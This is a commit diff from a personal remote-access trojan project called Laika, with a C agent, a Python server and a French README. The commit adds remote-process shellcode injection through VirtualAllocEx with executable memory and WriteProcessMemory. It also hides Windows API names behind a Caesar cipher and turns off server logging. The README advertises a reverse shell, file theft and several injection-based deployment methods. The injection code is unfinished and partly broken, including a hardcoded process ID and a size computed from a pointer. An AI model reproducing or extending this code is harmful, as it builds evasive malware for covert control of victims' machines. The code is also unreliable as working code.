début de shellcode injection, readme update
This commit is contained in:
88
Laika/main.c
88
Laika/main.c
@@ -287,9 +287,9 @@ retry:
|
||||
}
|
||||
|
||||
if (Api.strncmp(server_reply, "nsojhy", strlen("nsojhy")) == 0) { //inject
|
||||
char* arch = (char*)Api.malloc(3);
|
||||
char* arch = (char*)Api.malloc(2);
|
||||
|
||||
if (Api.recv(sock, arch, 3, 0) <= 0) {
|
||||
if (Api.recv(sock, arch, 2, 0) <= 0) {
|
||||
//send failed
|
||||
Api.free(arch);
|
||||
Sleep_(Sleep_TIME);
|
||||
@@ -297,57 +297,75 @@ retry:
|
||||
}
|
||||
CAESAR_DECRYPT(arch);
|
||||
|
||||
// Create a file handle for the memory buffer
|
||||
HANDLE hFile = Api.CreateFileW(
|
||||
L"ykifyk",
|
||||
GENERIC_READ | GENERIC_WRITE,
|
||||
FILE_SHARE_READ | FILE_SHARE_WRITE,
|
||||
NULL,
|
||||
CREATE_ALWAYS,
|
||||
FILE_ATTRIBUTE_NORMAL,
|
||||
NULL);
|
||||
HANDLE hFile = CreateFileMappingW(
|
||||
INVALID_HANDLE_VALUE, // Use the page file
|
||||
NULL, // Default security attributes
|
||||
PAGE_READWRITE, // Read/write access
|
||||
0, // Map the entire file
|
||||
BUFFER_SIZE, // Size of the file (in bytes)
|
||||
TEXT("idufhiu")); // Name of the file mapping object
|
||||
|
||||
upload_file(sock, hFile);
|
||||
|
||||
// Open the file handle for reading
|
||||
hFile = Api.CreateFileW(
|
||||
L"ykifyk",
|
||||
GENERIC_READ,
|
||||
FILE_SHARE_READ | FILE_SHARE_WRITE,
|
||||
NULL,
|
||||
OPEN_EXISTING,
|
||||
FILE_ATTRIBUTE_NORMAL,
|
||||
NULL);
|
||||
|
||||
if (hFile == INVALID_HANDLE_VALUE) {
|
||||
if (hFile == NULL) {
|
||||
Api.free(arch);
|
||||
Sleep_(Sleep_TIME);
|
||||
goto retry;
|
||||
}
|
||||
|
||||
char* buffer = (char*)Api.malloc(BUFFER_SIZE);
|
||||
Api.ReadFile(hFile, buffer, BUFFER_SIZE, NULL, NULL);
|
||||
Api.CloseHandle(hFile);
|
||||
upload_file(sock, hFile);
|
||||
|
||||
// Move the file pointer back to the beginning of the file
|
||||
Api.SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
|
||||
|
||||
HANDLE proc;
|
||||
if (Api.strncmp(arch, "x86", strlen("x86")) == 0) {
|
||||
proc = FindProcessByArch(L"x86");
|
||||
if (Api.strncmp(arch, "32", strlen("32")) == 0) {
|
||||
proc = Api.OpenProcess(PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, (DWORD)18872);//FindProcessByArch(L"x86");
|
||||
}
|
||||
else {
|
||||
proc = FindProcessByArch(L"x64");
|
||||
}
|
||||
|
||||
if (proc == NULL) {
|
||||
Api.free(arch);
|
||||
Api.free(buffer);
|
||||
|
||||
if (proc == NULL) {
|
||||
Api.CloseHandle(hFile);
|
||||
Sleep_(Sleep_TIME);
|
||||
goto retry;
|
||||
}
|
||||
|
||||
//Api.WriteProcessMemory(proc, (LPVOID)0, "", 0, NULL); WIP
|
||||
|
||||
// Get the size of the file
|
||||
LARGE_INTEGER fileSize;
|
||||
if (!Api.GetFileSizeEx(hFile, &fileSize))
|
||||
{
|
||||
Api.CloseHandle(hFile);
|
||||
Api.CloseHandle(proc);
|
||||
Sleep_(Sleep_TIME);
|
||||
goto retry;
|
||||
}
|
||||
|
||||
LPVOID addr = Api.VirtualAllocEx(proc, NULL, (size_t)fileSize.QuadPart, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (addr == NULL) {
|
||||
Api.CloseHandle(hFile);
|
||||
Api.CloseHandle(proc);
|
||||
Sleep_(Sleep_TIME);
|
||||
goto retry;
|
||||
}
|
||||
|
||||
DWORD bytesRead;
|
||||
char* shellcode = (char*)Api.malloc((size_t)fileSize.QuadPart);
|
||||
if (!Api.ReadFile(hFile, shellcode, sizeof(shellcode), &bytesRead, NULL))
|
||||
{
|
||||
Api.free(shellcode);
|
||||
Api.CloseHandle(hFile);
|
||||
Api.CloseHandle(proc);
|
||||
Sleep_(Sleep_TIME);
|
||||
goto retry;
|
||||
}
|
||||
|
||||
Api.WriteProcessMemory(proc, addr, shellcode, BUFFER_SIZE, NULL);
|
||||
|
||||
Api.free(shellcode);
|
||||
Api.CloseHandle(hFile);
|
||||
Api.CloseHandle(proc);
|
||||
Api.free(arch);
|
||||
Api.free(buffer);
|
||||
}
|
||||
|
||||
if (Api.strncmp(server_reply, "ljydknqjdqnxy", strlen("ljydknqjdqnxy")) == 0) { //get_file_list
|
||||
|
||||
@@ -41,6 +41,9 @@ void InitApis() {
|
||||
Api.Process32NextW = (TProcess32NextW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Uwthjxx87Sj}y\\"));
|
||||
Api.IsWow64Process = (TIsWow64Process)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Nx\\t|;9Uwthjxx"));
|
||||
Api.WriteProcessMemory = (TWriteProcessMemory)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjUwthjxxRjrtw~"));
|
||||
Api.VirtualAllocEx = (TVirtualAllocEx)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("[nwyzfqFqqthJ}"));
|
||||
Api.SetFilePointer = (TSetFilePointer)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("XjyKnqjUtnsyjw"));
|
||||
Api.GetFileSizeEx = (TGetFileSizeEx)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("LjyKnqjXn\x7fjJ}")); //GetFileSieEx
|
||||
|
||||
hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq"));
|
||||
if (!hMsvcrt) {
|
||||
|
||||
@@ -69,6 +69,9 @@ typedef HANDLE(WINAPI* TOpenProcess)(DWORD, BOOL, DWORD);
|
||||
typedef BOOL(WINAPI* TProcess32NextW)(HANDLE, LPPROCESSENTRY32W);
|
||||
typedef BOOL(WINAPI* TIsWow64Process)(HANDLE, PBOOL);
|
||||
typedef BOOL(WINAPI* TWriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*);
|
||||
typedef LPVOID(WINAPI* TVirtualAllocEx)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD);
|
||||
typedef DWORD(WINAPI* TSetFilePointer)(HANDLE, LONG, PLONG, DWORD);
|
||||
typedef BOOL(WINAPI* TGetFileSizeEx)(HANDLE, PLARGE_INTEGER);
|
||||
|
||||
typedef struct ApiList {
|
||||
Tconnect connect;
|
||||
@@ -115,6 +118,9 @@ typedef struct ApiList {
|
||||
TProcess32NextW Process32NextW;
|
||||
TIsWow64Process IsWow64Process;
|
||||
TWriteProcessMemory WriteProcessMemory;
|
||||
TVirtualAllocEx VirtualAllocEx;
|
||||
TSetFilePointer SetFilePointer;
|
||||
TGetFileSizeEx GetFileSizeEx;
|
||||
|
||||
Tmbstowcs mbstowcs;
|
||||
Twcstombs wcstombs;
|
||||
|
||||
@@ -23,7 +23,7 @@ HANDLE FindProcessByArch(const wchar_t* arch)
|
||||
HANDLE hProcess;
|
||||
BOOL isWow64;
|
||||
|
||||
hProcess = Api.OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
|
||||
hProcess = Api.OpenProcess(PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
|
||||
if (hProcess == NULL) {
|
||||
continue;
|
||||
}
|
||||
|
||||
@@ -145,8 +145,8 @@ def upload_file(fp, sock):
|
||||
|
||||
app = Flask(__name__)
|
||||
# Disable Flask's default logging
|
||||
#log = logging.getLogger('werkzeug')
|
||||
#log.disabled = True
|
||||
log = logging.getLogger('werkzeug')
|
||||
log.disabled = True
|
||||
|
||||
@app.route('/<path:filename>')
|
||||
def serve_file(filename):
|
||||
@@ -559,10 +559,7 @@ def main() -> None :
|
||||
continue
|
||||
|
||||
client.send(CAESAR("inject").encode())
|
||||
if arch == "32" :
|
||||
client.send(CAESAR("x86").encode())
|
||||
else :
|
||||
client.send(CAESAR("x64").encode())
|
||||
client.send(CAESAR(arch).encode())
|
||||
|
||||
fp = open(fichier, "rb")
|
||||
upload_file(fp, client)
|
||||
|
||||
@@ -1,14 +1,16 @@
|
||||
# Laika
|
||||
|
||||
J'ai commencé un début de Shellcode injection mais j'ai un peu la flemme de continuer. Pour bien faire il faudrait créer un process "zombie" qui va recevoir les shellcodes à injecter (agents/features), et un watcher qui le relance s'il meurt.<br>
|
||||
L'agent N'EST PAS plug and play, il manque certaines choses, de plus c'est un projet perso et c'est pas vraiment fait pour être utilisé.<br>
|
||||
|
||||
# Agent
|
||||
|
||||
## Features :
|
||||
* Reverse shell
|
||||
* File explorer (download/upload/remove)
|
||||
* Shellcode injection (TODO)
|
||||
|
||||
## Caractéristiques
|
||||
* Petit (12ko)
|
||||
* Petit (14ko)
|
||||
* Fait en C, sans CRT
|
||||
* x32 bit
|
||||
* Modulaire (peut se déployer via shellcode/dll/pe injection/.exe)
|
||||
|
||||
Reference in New Issue
Block a user